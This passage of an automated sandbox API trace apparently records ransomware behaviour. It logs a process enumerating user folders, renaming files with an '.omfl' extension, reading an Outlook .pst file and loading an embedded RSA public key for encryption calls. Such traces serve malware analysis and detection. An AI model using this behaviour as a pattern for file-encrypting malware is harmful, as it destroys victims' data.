Shapes\\Favorites.vss") returned=".vss" [0132.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.055] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=0) returned 1 [0132.055] CloseHandle (hObject=0x610) returned 1 [0132.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.omfl")) returned 1 [0132.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0132.056] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0132.056] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0132.056] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0132.057] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.057] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0132.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.057] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.057] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.057] PathFindFileNameW (pszPath="") returned="" [0132.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0132.058] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.058] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.058] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0132.058] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.058] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.058] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.058] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.058] PathFindFileNameW (pszPath="") returned="" [0132.058] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.058] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.058] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0132.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0132.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.059] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=271360) returned 1 [0132.059] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.062] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.062] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.063] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.063] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x25805, lpOverlapped=0x0) returned 1 [0132.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.067] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.068] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.068] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.068] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.068] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.068] GetLastError () returned 0x0 [0132.068] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.068] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.069] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.069] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.069] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.069] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25810) returned 0xdd35410 [0132.071] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db9a0 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17358 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db9e8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17370 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173a0 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173b8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.072] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173b8 | out: hHeap=0x4970000) returned 1 [0132.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173b8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd173a0 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173b8 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.073] GetCurrentThreadId () returned 0x618 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579710 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.073] GetCurrentThreadId () returned 0x618 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173a0 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173b8 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17388 [0132.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173d0 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8c0 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173a0 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: 